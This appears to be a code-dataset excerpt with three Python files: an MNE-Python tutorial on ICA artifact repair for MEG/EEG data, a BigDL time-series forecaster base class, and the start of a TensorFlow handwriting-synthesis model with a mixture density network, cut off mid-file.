# If ``noise_cov=None`` (default), all data of a given channel type is
# scaled by the standard deviation across all channels. If ``noise_cov`` is
# a `~mne.Covariance`, the channels are pre-whitened using the covariance.
# 2. The pre-whitened data are then decomposed using PCA.
#
# From the resulting principal components (PCs), the first ``n_components`` are
# then passed to the ICA algorithm if ``n_components`` is an integer number.
# It can also be a float between 0 and 1, specifying the **fraction** of
# explained variance that the PCs should capture; the appropriate number of
# PCs (i.e., just as many PCs as are required to explain the given fraction
# of total variance) is then passed to the ICA.
#
# After visualizing the Independent Components (ICs) and excluding any that
# capture artifacts you want to repair, the sensor signal can be reconstructed
# using the `~mne.preprocessing.ICA` object's
# `~mne.preprocessing.ICA.apply` method. By default, signal
# reconstruction uses all of the ICs (less any ICs listed in ``ICA.exclude``)
# plus all of the PCs that were not included in the ICA decomposition (i.e.,
# the "PCA residual"). If you want to reduce the number of components used at
# the reconstruction stage, it is controlled by the ``n_pca_components``
# parameter (which will in turn reduce the rank of your data; by default
# ``n_pca_components=None`` resulting in no additional dimensionality
# reduction). The fitting and reconstruction procedures and the
# parameters that control dimensionality at various stages are summarized in
# the diagram below:
#
#
# .. raw:: html
#
# <a href=
# "../../_images/graphviz-7483cb1cf41f06e2a4ef451b17f073dbe584ba30.png">
#
# .. graphviz:: ../../_static/diagrams/ica.dot
# :alt: Diagram of ICA procedure in MNE-Python
# :align: left
#
# .. raw:: html
#
# </a>
#
# See the Notes section of the `~mne.preprocessing.ICA` documentation
# for further details. Next we'll walk through an extended example that
# illustrates each of these steps in greater detail.
#
# Example: EOG and ECG artifact repair
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# Visualizing the artifacts
# ~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Let's begin by visualizing the artifacts that we want to repair. In this
# dataset they are big enough to see easily in the raw data:
# pick some channels that clearly show heartbeats and blinks
regexp = r'(MEG [12][45][123]1|EEG 00.)'
artifact_picks = mne.pick_channels_regexp(raw.ch_names, regexp=regexp)
raw.plot(order=artifact_picks, n_channels=len(artifact_picks),
show_scrollbars=False)
# %%
# We can get a summary of how the ocular artifact manifests across each channel
# type using `~mne.preprocessing.create_eog_epochs` like we did in the
# :ref:`tut-artifact-overview` tutorial:
eog_evoked = create_eog_epochs(raw).average()
eog_evoked.apply_baseline(baseline=(None, -0.2))
eog_evoked.plot_joint()
# %%
# Now we'll do the same for the heartbeat artifacts, using
# `~mne.preprocessing.create_ecg_epochs`:
ecg_evoked = create_ecg_epochs(raw).average()
ecg_evoked.apply_baseline(baseline=(None, -0.2))
ecg_evoked.plot_joint()
# %%
# Filtering to remove slow drifts
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Before we run the ICA, an important step is filtering the data to remove
# low-frequency drifts, which can negatively affect the quality of the ICA fit.
# The slow drifts are problematic because they reduce the independence of the
# assumed-to-be-independent sources (e.g., during a slow upward drift, the
# neural, heartbeat, blink, and other muscular sources will all tend to have
# higher values), making it harder for the algorithm to find an accurate
# solution. A high-pass filter with 1 Hz cutoff frequency is recommended.
# However, because filtering is a linear operation, the ICA solution found from
# the filtered signal can be applied to the unfiltered signal (see
# :footcite:`WinklerEtAl2015` for
# more information), so we'll keep a copy of the unfiltered
# `~mne.io.Raw` object around so we can apply the ICA solution to it
# later.
filt_raw = raw.copy().load_data().filter(l_freq=1., h_freq=None)
# %%
# Fitting and plotting the ICA solution
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# .. sidebar:: Ignoring the time domain
#
# The ICA algorithms implemented in MNE-Python find patterns across
# channels, but ignore the time domain. This means you can compute ICA on
# discontinuous `~mne.Epochs` or `~mne.Evoked` objects (not
# just continuous `~mne.io.Raw` objects), or only use every Nth
# sample by passing the ``decim`` parameter to ``ICA.fit()``.
#
# .. note:: `~mne.Epochs` used for fitting ICA should not be
# baseline-corrected. Because cleaning the data via ICA may
# introduce DC offsets, we suggest to baseline correct your data
# **after** cleaning (and not before), should you require
# baseline correction.
#
# Now we're ready to set up and fit the ICA. Since we know (from observing our
# raw data) that the EOG and ECG artifacts are fairly strong, we would expect
# those artifacts to be captured in the first few dimensions of the PCA
# decomposition that happens before the ICA. Therefore, we probably don't need
# a huge number of components to do a good job of isolating our artifacts
# (though it is usually preferable to include more components for a more
# accurate solution). As a first guess, we'll run ICA with ``n_components=15``
# (use only the first 15 PCA components to compute the ICA decomposition) — a
# very small number given that our data has over 300 channels, but with the
# advantage that it will run quickly and we will able to tell easily whether it
# worked or not (because we already know what the EOG / ECG artifacts should
# look like).
#
# ICA fitting is not deterministic (e.g., the components may get a sign
# flip on different runs, or may not always be returned in the same order), so
# we'll also specify a `random seed`_ so that we get identical results each
# time this tutorial is built by our web servers.
ica = ICA(n_components=15, max_iter='auto', random_state=97)
ica.fit(filt_raw)
ica
# %%
# Some optional parameters that we could have passed to the
# `~mne.preprocessing.ICA.fit` method include ``decim`` (to use only
# every Nth sample in computing the ICs, which can yield a considerable
# speed-up) and ``reject`` (for providing a rejection dictionary for maximum
# acceptable peak-to-peak amplitudes for each channel type, just like we used
# when creating epoched data in the :ref:`tut-overview` tutorial).
#
# Now we can examine the ICs to see what they captured.
# `~mne.preprocessing.ICA.plot_sources` will show the time series of the
# ICs. Note that in our call to `~mne.preprocessing.ICA.plot_sources` we
# can use the original, unfiltered `~mne.io.Raw` object:
raw.load_data()
ica.plot_sources(raw, show_scrollbars=False)
# %%
# Here we can pretty clearly see that the first component (``ICA000``) captures
# the EOG signal quite well, and the second component (``ICA001``) looks a lot
# like `a heartbeat <qrs_>`_ (for more info on visually identifying Independent
# Components, `this EEGLAB tutorial`_ is a good resource). We can also
# visualize the scalp field distribution of each component using
# `~mne.preprocessing.ICA.plot_components`. These are interpolated based
# on the values in the ICA mixing matrix:
# sphinx_gallery_thumbnail_number = 9
ica.plot_components()
# %%
# .. note::
#
# `~mne.preprocessing.ICA.plot_components` (which plots the scalp
# field topographies for each component) has an optional ``inst`` parameter
# that takes an instance of `~mne.io.Raw` or `~mne.Epochs`.
# Passing ``inst`` makes the scalp topographies interactive: clicking one
# will bring up a diagnostic `~mne.preprocessing.ICA.plot_properties`
# window (see below) for that component.
#
# In the plots above it's fairly obvious which ICs are capturing our EOG and
# ECG artifacts, but there are additional ways visualize them anyway just to
# be sure. First, we can plot an overlay of the original signal against the
# reconstructed signal with the artifactual ICs excluded, using
# `~mne.preprocessing.ICA.plot_overlay`:
# blinks
ica.plot_overlay(raw, exclude=[0], picks='eeg')
# heartbeats
ica.plot_overlay(raw, exclude=[1], picks='mag')
# %%
# We can also plot some diagnostics of each IC using
# `~mne.preprocessing.ICA.plot_properties`:
ica.plot_properties(raw, picks=[0, 1])
# %%
# In the remaining sections, we'll look at different ways of choosing which ICs
# to exclude prior to reconstructing the sensor signals.
#
#
# Selecting ICA components manually
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Once we're certain which components we want to exclude, we can specify that
# manually by setting the ``ica.exclude`` attribute. Similar to marking bad
# channels, merely setting ``ica.exclude`` doesn't do anything immediately (it
# just adds the excluded ICs to a list that will get used later when it's
# needed). Once the exclusions have been set, ICA methods like
# `~mne.preprocessing.ICA.plot_overlay` will exclude those component(s)
# even if no ``exclude`` parameter is passed, and the list of excluded
# components will be preserved when using `mne.preprocessing.ICA.save`
# and `mne.preprocessing.read_ica`.
ica.exclude = [0, 1] # indices chosen based on various plots above
# %%
# Now that the exclusions have been set, we can reconstruct the sensor signals
# with artifacts removed using the `~mne.preprocessing.ICA.apply` method
# (remember, we're applying the ICA solution from the *filtered* data to the
# original *unfiltered* signal). Plotting the original raw data alongside the
# reconstructed data shows that the heartbeat and blink artifacts are repaired.
# ica.apply() changes the Raw object in-place, so let's make a copy first:
reconst_raw = raw.copy()
ica.apply(reconst_raw)
raw.plot(order=artifact_picks, n_channels=len(artifact_picks),
show_scrollbars=False)
reconst_raw.plot(order=artifact_picks, n_channels=len(artifact_picks),
show_scrollbars=False)
del reconst_raw
# %%
# Using an EOG channel to select ICA components
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# It may have seemed easy to review the plots and manually select which ICs to
# exclude, but when processing dozens or hundreds of subjects this can become
# a tedious, rate-limiting step in the analysis pipeline. One alternative is to
# use dedicated EOG or ECG sensors as a "pattern" to check the ICs against, and
# automatically mark for exclusion any ICs that match the EOG/ECG pattern. Here
# we'll use `~mne.preprocessing.ICA.find_bads_eog` to automatically find
# the ICs that best match the EOG signal, then use
# `~mne.preprocessing.ICA.plot_scores` along with our other plotting
# functions to see which ICs it picked. We'll start by resetting
# ``ica.exclude`` back to an empty list:
ica.exclude = []
# find which ICs match the EOG pattern
eog_indices, eog_scores = ica.find_bads_eog(raw)
ica.exclude = eog_indices
# barplot of ICA component "EOG match" scores
ica.plot_scores(eog_scores)
# plot diagnostics
ica.plot_properties(raw, picks=eog_indices)
# plot ICs applied to raw data, with EOG matches highlighted
ica.plot_sources(raw, show_scrollbars=False)
# plot ICs applied to the averaged EOG epochs, with EOG matches highlighted
ica.plot_sources(eog_evoked)
# %%
# Note that above we used `~mne.preprocessing.ICA.plot_sources` on both
# the original `~mne.io.Raw` instance and also on an
# `~mne.Evoked` instance of the extracted EOG artifacts. This can be
# another way to confirm that `~mne.preprocessing.ICA.find_bads_eog` has
# identified the correct components.
#
#
# Using a simulated channel to select ICA components
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# If you don't have an EOG channel,
# `~mne.preprocessing.ICA.find_bads_eog` has a ``ch_name`` parameter that
# you can use as a proxy for EOG. You can use a single channel, or create a
# bipolar reference from frontal EEG sensors and use that as virtual EOG
# channel. This carries a risk however: you must hope that the frontal EEG
# channels only reflect EOG and not brain dynamics in the prefrontal cortex (or
# you must not care about those prefrontal signals).
#
# For ECG, it is easier: `~mne.preprocessing.ICA.find_bads_ecg` can use
# cross-channel averaging of magnetometer or gradiometer channels to construct
# a virtual ECG channel, so if you have MEG channels it is usually not
# necessary to pass a specific channel name.
# `~mne.preprocessing.ICA.find_bads_ecg` also has two options for its
# ``method`` parameter: ``'ctps'`` (cross-trial phase statistics
# :footcite:`DammersEtAl2008`) and
# ``'correlation'`` (Pearson correlation between data and ECG channel).
ica.exclude = []
# find which ICs match the ECG pattern
ecg_indices, ecg_scores = ica.find_bads_ecg(raw, method='correlation',
threshold='auto')
ica.exclude = ecg_indices
# barplot of ICA component "ECG match" scores
ica.plot_scores(ecg_scores)
# plot diagnostics
ica.plot_properties(raw, picks=ecg_indices)
# plot ICs applied to raw data, with ECG matches highlighted
ica.plot_sources(raw, show_scrollbars=False)
# plot ICs applied to the averaged ECG epochs, with ECG matches highlighted
ica.plot_sources(ecg_evoked)
# %%
# The last of these plots is especially useful: it shows us that the heartbeat
# artifact is coming through on *two* ICs, and we've only caught one of them.
# In fact, if we look closely at the output of
# `~mne.preprocessing.ICA.plot_sources` (online, you can right-click →
# "view image" to zoom in), it looks like ``ICA014`` has a weak periodic
# component that is in-phase with ``ICA001``. It might be worthwhile to re-run
# the ICA with more components to see if that second heartbeat artifact
# resolves out a little better:
# refit the ICA with 30 components this time
new_ica = ICA(n_components=30, max_iter='auto', random_state=97)
new_ica.fit(filt_raw)
# find which ICs match the ECG pattern
ecg_indices, ecg_scores = new_ica.find_bads_ecg(raw, method='correlation',
threshold='auto')
new_ica.exclude = ecg_indices
# barplot of ICA component "ECG match" scores
new_ica.plot_scores(ecg_scores)
# plot diagnostics
new_ica.plot_properties(raw, picks=ecg_indices)
# plot ICs applied to raw data, with ECG matches highlighted
new_ica.plot_sources(raw, show_scrollbars=False)
# plot ICs applied to the averaged ECG epochs, with ECG matches highlighted
new_ica.plot_sources(ecg_evoked)
# %%
# Much better! Now we've captured both ICs that are reflecting the heartbeat
# artifact (and as a result, we got two diagnostic plots: one for each IC that
# reflects the heartbeat). This demonstrates the value of checking the results
# of automated approaches like `~mne.preprocessing.ICA.find_bads_ecg`
# before accepting them.
# clean up memory before moving on
del raw, ica, new_ica
# %%
# Selecting ICA components using template matching
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# When dealing with multiple subjects, it is also possible to manually select
# an IC for exclusion on one subject, and then use that component as a
# *template* for selecting which ICs to exclude from other subjects' data,
# using `mne.preprocessing.corrmap` :footcite:`CamposViolaEtAl2009`.
# The idea behind `~mne.preprocessing.corrmap` is that the artifact patterns
# are similar
# enough across subjects that corresponding ICs can be identified by
# correlating the ICs from each ICA solution with a common template, and
# picking the ICs with the highest correlation strength.
# `~mne.preprocessing.corrmap` takes a list of ICA solutions, and a
# ``template`` parameter that specifies which ICA object and which component
# within it to use as a template.
#
# Since our sample dataset only contains data from one subject, we'll use a
# different dataset with multiple subjects: the EEGBCI dataset
# :footcite:`SchalkEtAl2004,GoldbergerEtAl2000`. The
# dataset has 109 subjects, we'll just download one run (a left/right hand
# movement task) from each of the first 4 subjects:
mapping = {
'Fc5.': 'FC5', 'Fc3.': 'FC3', 'Fc1.': 'FC1', 'Fcz.': 'FCz', 'Fc2.': 'FC2',
'Fc4.': 'FC4', 'Fc6.': 'FC6', 'C5..': 'C5', 'C3..': 'C3', 'C1..': 'C1',
'Cz..': 'Cz', 'C2..': 'C2', 'C4..': 'C4', 'C6..': 'C6', 'Cp5.': 'CP5',
'Cp3.': 'CP3', 'Cp1.': 'CP1', 'Cpz.': 'CPz', 'Cp2.': 'CP2', 'Cp4.': 'CP4',
'Cp6.': 'CP6', 'Fp1.': 'Fp1', 'Fpz.': 'Fpz', 'Fp2.': 'Fp2', 'Af7.': 'AF7',
'Af3.': 'AF3', 'Afz.': 'AFz', 'Af4.': 'AF4', 'Af8.': 'AF8', 'F7..': 'F7',
'F5..': 'F5', 'F3..': 'F3', 'F1..': 'F1', 'Fz..': 'Fz', 'F2..': 'F2',
'F4..': 'F4', 'F6..': 'F6', 'F8..': 'F8', 'Ft7.': 'FT7', 'Ft8.': 'FT8',
'T7..': 'T7', 'T8..': 'T8', 'T9..': 'T9', 'T10.': 'T10', 'Tp7.': 'TP7',
'Tp8.': 'TP8', 'P7..': 'P7', 'P5..': 'P5', 'P3..': 'P3', 'P1..': 'P1',
'Pz..': 'Pz', 'P2..': 'P2', 'P4..': 'P4', 'P6..': 'P6', 'P8..': 'P8',
'Po7.': 'PO7', 'Po3.': 'PO3', 'Poz.': 'POz', 'Po4.': 'PO4', 'Po8.': 'PO8',
'O1..': 'O1', 'Oz..': 'Oz', 'O2..': 'O2', 'Iz..': 'Iz'
}
raws = list()
icas = list()
for subj in range(4):
# EEGBCI subjects are 1-indexed; run 3 is a left/right hand movement task
fname = mne.datasets.eegbci.load_data(subj + 1, runs=[3])[0]
raw = mne.io.read_raw_edf(fname)
# remove trailing `.` from channel names so we can set montage
raw.rename_channels(mapping)
raw.set_montage('standard_1005')
# high-pass filter
raw_filt = raw.copy().load_data().filter(l_freq=1., h_freq=None)
# fit ICA
ica = ICA(n_components=30, max_iter='auto', random_state=97)
ica.fit(raw_filt)
raws.append(raw)
icas.append(ica)
# %%
# Now let's run `~mne.preprocessing.corrmap`:
# use the first subject as template; use Fpz as proxy for EOG
raw = raws[0]
ica = icas[0]
eog_inds, eog_scores = ica.find_bads_eog(raw, ch_name='Fpz')
corrmap(icas, template=(0, eog_inds[0]))
# %%
# The first figure shows the template map, while the second figure shows all
# the maps that were considered a "match" for the template (including the
# template itself). There is one match for each subject, but it's a good idea
# to also double-check the ICA sources for each subject:
for index, (ica, raw) in enumerate(zip(icas, raws)):
fig = ica.plot_sources(raw, show_scrollbars=False)
fig.subplots_adjust(top=0.9) # make space for title
fig.suptitle('Subject {}'.format(index))
# %%
# Notice that subjects 2 and 3 each seem to have *two* ICs that reflect ocular
# activity (components ``ICA000`` and ``ICA002``), but only one was caught by
# `~mne.preprocessing.corrmap`. Let's try setting the threshold manually:
corrmap(icas, template=(0, eog_inds[0]), threshold=0.9)
# %%
# This time it found 2 ICs for each of subjects 2 and 3 (which is good).
# At this point we'll re-run `~mne.preprocessing.corrmap` with
# parameters ``label='blink', plot=False`` to *label* the ICs from each subject
# that capture the blink artifacts (without plotting them again).
corrmap(icas, template=(0, eog_inds[0]), threshold=0.9, label='blink',
plot=False)
print([ica.labels_ for ica in icas])
# %%
# Notice that the first subject has 3 different labels for the IC at index 0:
# "eog/0/Fpz", "eog", and "blink". The first two were added by
# `~mne.preprocessing.ICA.find_bads_eog`; the "blink" label was added by the
# last call to `~mne.preprocessing.corrmap`. Notice also that each subject has
# at least one IC index labelled "blink", and subjects 2 and 3 each have two
# components (0 and 2) labelled "blink" (consistent with the plot of IC sources
# above). The ``labels_`` attribute of `~mne.preprocessing.ICA` objects can
# also be manually edited to annotate the ICs with custom labels. They also
# come in handy when plotting:
icas[3].plot_components(picks=icas[3].labels_['blink'])
icas[3].exclude = icas[3].labels_['blink']
icas[3].plot_sources(raws[3], show_scrollbars=False)
# %%
# As a final note, it is possible to extract ICs numerically using the
# `~mne.preprocessing.ICA.get_components` method of
# `~mne.preprocessing.ICA` objects. This will return a :class:`NumPy
# array <numpy.ndarray>` that can be passed to
# `~mne.preprocessing.corrmap` instead of the :class:`tuple` of
# ``(subject_index, component_index)`` we passed before, and will yield the
# same result:
template_eog_component = icas[0].get_components()[:, eog_inds[0]]
corrmap(icas, template=template_eog_component, threshold=0.9)
print(template_eog_component)
# %%
# An advantage of using this numerical representation of an IC to capture a
# particular artifact pattern is that it can be saved and used as a template
# for future template-matching tasks using `~mne.preprocessing.corrmap`
# without having to load or recompute the ICA solution that yielded the
# template originally. Put another way, when the template is a NumPy array, the
# `~mne.preprocessing.ICA` object containing the template does not need
# to be in the list of ICAs provided to `~mne.preprocessing.corrmap`.
#
# .. LINKS
#
# .. _`blind source separation`:
# https://en.wikipedia.org/wiki/Signal_separation
# .. _`statistically independent`:
# https://en.wikipedia.org/wiki/Independence_(probability_theory)
# .. _`scikit-learn`: https://scikit-learn.org
# .. _`random seed`: https://en.wikipedia.org/wiki/Random_seed
# .. _`regular expression`: https://www.regular-expressions.info/
# .. _`qrs`: https://en.wikipedia.org/wiki/QRS_complex
# .. _`this EEGLAB tutorial`: https://labeling.ucsd.edu/tutorial/labels
# %%
# Compute ICA components on Epochs
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# ICA is now fit to epoched MEG data instead of the raw data.
# We assume that the non-stationary EOG artifacts have already been removed.
# The sources matching the ECG are automatically found and displayed.
#
# .. note::
# This example is computationally intensive, so it might take a few minutes
# to complete.
#
# After reading the data, preprocessing consists of:
#
# - MEG channel selection
# - 1-30 Hz band-pass filter
# - epoching -0.2 to 0.5 seconds with respect to events
# - rejection based on peak-to-peak amplitude
#
# Note that we don't baseline correct the epochs here – we'll do this after
# cleaning with ICA is completed. Baseline correction before ICA is not
# recommended by the MNE-Python developers, as it doesn't guarantee optimal
# results.
filt_raw.pick_types(meg=True, eeg=False, exclude='bads', stim=True).load_data()
filt_raw.filter(1, 30, fir_design='firwin')
# peak-to-peak amplitude rejection parameters
reject = dict(grad=4000e-13, mag=4e-12)
# create longer and more epochs for more artifact exposure
events = mne.find_events(filt_raw, stim_channel='STI 014')
# don't baseline correct epochs
epochs = mne.Epochs(filt_raw, events, event_id=None, tmin=-0.2, tmax=0.5,
reject=reject, baseline=None)
# %%
# Fit ICA model using the FastICA algorithm, detect and plot components
# explaining ECG artifacts.
ica = ICA(n_components=15, method='fastica', max_iter="auto").fit(epochs)
ecg_epochs = create_ecg_epochs(filt_raw, tmin=-.5, tmax=.5)
ecg_inds, scores = ica.find_bads_ecg(ecg_epochs, threshold='auto')
ica.plot_components(ecg_inds)
# %%
# Plot the properties of the ECG components:
ica.plot_properties(epochs, picks=ecg_inds)
# %%
# Plot the estimated sources of detected ECG related components:
ica.plot_sources(filt_raw, picks=ecg_inds)
# %%
# References
# ^^^^^^^^^^
# .. footbibliography::
|
bloyl/mne-python
|
tutorials/preprocessing/40_artifact_correction_ica.py
|
Python
|
bsd-3-clause
| 29,351
|
[
"Gaussian"
] |
b0c26ec8fe42b2d8880eaa7c64a2cfb7decfee5b8148b231257ba94e61dfaedd
|
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABCMeta, abstractmethod
from bigdl.orca.tfpark import KerasModel as TFParkKerasModel
import tensorflow as tf
from bigdl.chronos.forecaster.abstract import Forecaster
class TFParkForecaster(TFParkKerasModel, Forecaster, metaclass=ABCMeta):
"""
Base class for TFPark KerasModel based Forecast models.
"""
def __init__(self):
"""
Build a tf.keras model.
Turns the tf.keras model returned from _build into a tfpark.KerasModel
"""
self.model = self._build()
assert (isinstance(self.model, tf.keras.Model))
super().__init__(self.model)
@abstractmethod
def _build(self):
"""
Build a tf.keras model.
:return: a tf.keras model (compiled)
"""
pass
|
intel-analytics/BigDL
|
python/chronos/src/bigdl/chronos/forecaster/tfpark_forecaster.py
|
Python
|
apache-2.0
| 1,366
|
[
"ORCA"
] |
9fc21a0c0eadaf2c49bf1d0954cb2610e14c82117afedea2b09e47b4a12807d5
|
import numpy as np
import numpy.matlib
import math
import random
import os
import xml.etree.ElementTree as ET
import tensorflow as tf
from utils import *
class Model():
def __init__(self, args, logger):
self.logger = logger
# ----- transfer some of the args params over to the model
# model params
self.rnn_size = args.rnn_size
self.train = args.train
self.nmixtures = args.nmixtures
self.kmixtures = args.kmixtures
self.batch_size = args.batch_size if self.train else 1 # training/sampling specific
self.tsteps = args.tsteps if self.train else 1 # training/sampling specific
self.alphabet = args.alphabet
# training params
self.dropout = args.dropout
self.grad_clip = args.grad_clip
# misc
self.tsteps_per_ascii = args.tsteps_per_ascii
self.data_dir = args.data_dir
self.graves_initializer = tf.truncated_normal_initializer(mean=0., stddev=.075, seed=None, dtype=tf.float32)
self.window_b_initializer = tf.truncated_normal_initializer(mean=-3.0, stddev=.25, seed=None, dtype=tf.float32) # hacky initialization
self.logger.write('\tusing alphabet{}'.format(self.alphabet))
self.char_vec_len = len(self.alphabet) + 1 #plus one for <UNK> token
self.ascii_steps = args.tsteps/args.tsteps_per_ascii
# ----- build the basic recurrent network architecture
cell_func = tf.contrib.rnn.LSTMCell # could be GRUCell or RNNCell
self.cell0 = cell_func(args.rnn_size, state_is_tuple=True, initializer=self.graves_initializer)
self.cell1 = cell_func(args.rnn_size, state_is_tuple=True, initializer=self.graves_initializer)
self.cell2 = cell_func(args.rnn_size, state_is_tuple=True, initializer=self.graves_initializer)
if (self.train and self.dropout < 1): # training mode
self.cell0 = tf.contrib.rnn.DropoutWrapper(self.cell0, output_keep_prob = self.dropout)
self.cell1 = tf.contrib.rnn.DropoutWrapper(self.cell1, output_keep_prob = self.dropout)
self.cell2 = tf.contrib.rnn.DropoutWrapper(self.cell2, output_keep_prob = self.dropout)
self.input_data = tf.placeholder(dtype=tf.float32, shape=[None, self.tsteps, 3])
self.target_data = tf.placeholder(dtype=tf.float32, shape=[None, self.tsteps, 3])
self.istate_cell0 = self.cell0.zero_state(batch_size=self.batch_size, dtype=tf.float32)
self.istate_cell1 = self.cell1.zero_state(batch_size=self.batch_size, dtype=tf.float32)
self.istate_cell2 = self.cell2.zero_state(batch_size=self.batch_size, dtype=tf.float32)
#slice the input volume into separate vols for each tstep
inputs = [tf.squeeze(input_, [1]) for input_ in tf.split(self.input_data, self.tsteps, 1)]
#build cell0 computational graph
outs_cell0, self.fstate_cell0 = tf.contrib.legacy_seq2seq.rnn_decoder(inputs, self.istate_cell0, self.cell0, loop_function=None, scope='cell0')
# ----- build the gaussian character window
def get_window(alpha, beta, kappa, c):
# phi -> [? x 1 x ascii_steps] and is a tf matrix
# c -> [? x ascii_steps x alphabet] and is a tf matrix
ascii_steps = c.get_shape()[1].value #number of items in sequence
phi = get_phi(ascii_steps, alpha, beta, kappa)
window = tf.matmul(phi,c)
window = tf.squeeze(window, [1]) # window ~ [?,alphabet]
return window, phi
#get phi for all t,u (returns a [1 x tsteps] matrix) that defines the window
def get_phi(ascii_steps, alpha, beta, kappa):
# alpha, beta, kappa -> [?,kmixtures,1] and each is a tf variable
u = np.linspace(0,ascii_steps-1,ascii_steps) # weight all the U items in the sequence
kappa_term = tf.square( tf.subtract(kappa,u))
exp_term = tf.multiply(-beta,kappa_term)
phi_k = tf.multiply(alpha, tf.exp(exp_term))
phi = tf.reduce_sum(phi_k,1, keep_dims=True)
return phi # phi ~ [?,1,ascii_steps]
def get_window_params(i, out_cell0, kmixtures, prev_kappa, reuse=True):
hidden = out_cell0.get_shape()[1]
n_out = 3*kmixtures
with tf.variable_scope('window',reuse=reuse):
window_w = tf.get_variable("window_w", [hidden, n_out], initializer=self.graves_initializer)
window_b = tf.get_variable("window_b", [n_out], initializer=self.window_b_initializer)
abk_hats = tf.nn.xw_plus_b(out_cell0, window_w, window_b) # abk_hats ~ [?,n_out]
abk = tf.exp(tf.reshape(abk_hats, [-1, 3*kmixtures,1])) # abk_hats ~ [?,n_out] = "alpha, beta, kappa hats"
alpha, beta, kappa = tf.split(abk, 3, 1) # alpha_hat, etc ~ [?,kmixtures]
kappa = kappa + prev_kappa
return alpha, beta, kappa # each ~ [?,kmixtures,1]
self.init_kappa = tf.placeholder(dtype=tf.float32, shape=[None, self.kmixtures, 1])
self.char_seq = tf.placeholder(dtype=tf.float32, shape=[None, self.ascii_steps, self.char_vec_len])
prev_kappa = self.init_kappa
prev_window = self.char_seq[:,0,:]
#add gaussian window result
reuse = False
for i in range(len(outs_cell0)):
[alpha, beta, new_kappa] = get_window_params(i, outs_cell0[i], self.kmixtures, prev_kappa, reuse=reuse)
window, phi = get_window(alpha, beta, new_kappa, self.char_seq)
outs_cell0[i] = tf.concat((outs_cell0[i],window), 1) #concat outputs
outs_cell0[i] = tf.concat((outs_cell0[i],inputs[i]), 1) #concat input data
prev_kappa = new_kappa
prev_window = window
reuse = True
#save some attention mechanism params (useful for sampling/debugging later)
self.window = window
self.phi = phi
self.new_kappa = new_kappa
self.alpha = alpha
# ----- finish building LSTMs 2 and 3
outs_cell1, self.fstate_cell1 = tf.contrib.legacy_seq2seq.rnn_decoder(outs_cell0, self.istate_cell1, self.cell1, loop_function=None, scope='cell1')
outs_cell2, self.fstate_cell2 = tf.contrib.legacy_seq2seq.rnn_decoder(outs_cell1, self.istate_cell2, self.cell2, loop_function=None, scope='cell2')
# ----- start building the `Mixture Density Network `on top (start with a dense layer to predict the MDN params)
n_out = 1 + self.nmixtures * 6 # params = end_of_stroke + 6 parameters per Gaussian
with tf.variable_scope('mdn_dense'):
mdn_w = tf.get_variable("output_w", [self.rnn_size, n_out], initializer=self.graves_initializer)
mdn_b = tf.get_variable("output_b", [n_out], initializer=self.graves_initializer)
out_cell2 = tf.reshape(tf.concat(outs_cell2, 1), [-1, args.rnn_size]) #concat outputs for efficiency
output = tf.nn.xw_plus_b(out_cell2, mdn_w, mdn_b) #data flows through dense nn
# ----- build mixture density cap on top of second recurrent cell
def gaussian2d(x1, x2, mu1, mu2, s1, s2, rho):
# define gaussian mdn (eq 24, 25 from http://arxiv.org/abs/1308.0850)
x_mu1 = tf.subtract(x1, mu1)
x_mu2 = tf.subtract(x2, mu2)
Z = tf.square(tf.div(x_mu1, s1)) + \
tf.square(tf.div(x_mu2, s2)) - \
2*tf.div(tf.multiply(rho, tf.multiply(x_mu1, x_mu2)), tf.multiply(s1, s2))
rho_square_term = 1-tf.square(rho)
power_e = tf.exp(tf.div(-Z,2*rho_square_term))
regularize_term = 2*np.pi*tf.multiply(tf.multiply(s1, s2), tf.sqrt(rho_square_term))
gaussian = tf.div(power_e, regularize_term)
return gaussian
def get_loss(pi, x1_data, x2_data, eos_data, mu1, mu2, sigma1, sigma2, rho, eos):
# define loss function (eq 26 of http://arxiv.org/abs/1308.0850)
gaussian = gaussian2d(x1_data, x2_data, mu1, mu2, sigma1, sigma2, rho)
term1 = tf.multiply(gaussian, pi)
term1 = tf.reduce_sum(term1, 1, keep_dims=True) #do inner summation
term1 = -tf.log(tf.maximum(term1, 1e-20)) # some errors are zero -> numerical errors.
term2 = tf.multiply(eos, eos_data) + tf.multiply(1-eos, 1-eos_data) #modified Bernoulli -> eos probability
term2 = -tf.log(term2) #negative log error gives loss
return tf.reduce_sum(term1 + term2) #do outer summation
# now transform dense NN outputs into params for MDN
def get_mdn_coef(Z):
# returns the tf slices containing mdn dist params (eq 18...23 of http://arxiv.org/abs/1308.0850)
eos_hat = Z[:, 0:1] #end of sentence tokens
pi_hat, mu1_hat, mu2_hat, sigma1_hat, sigma2_hat, rho_hat = tf.split(Z[:, 1:], 6, 1)
self.pi_hat, self.sigma1_hat, self.sigma2_hat = \
pi_hat, sigma1_hat, sigma2_hat # these are useful for bias method during sampling
eos = tf.sigmoid(-1*eos_hat) # technically we gained a negative sign
pi = tf.nn.softmax(pi_hat) # softmax z_pi:
mu1 = mu1_hat; mu2 = mu2_hat # leave mu1, mu2 as they are
sigma1 = tf.exp(sigma1_hat); sigma2 = tf.exp(sigma2_hat) # exp for sigmas
rho = tf.tanh(rho_hat) # tanh for rho (squish between -1 and 1)rrr
return [eos, pi, mu1, mu2, sigma1, sigma2, rho]
# reshape target data (as we did the input data)
flat_target_data = tf.reshape(self.target_data,[-1, 3])
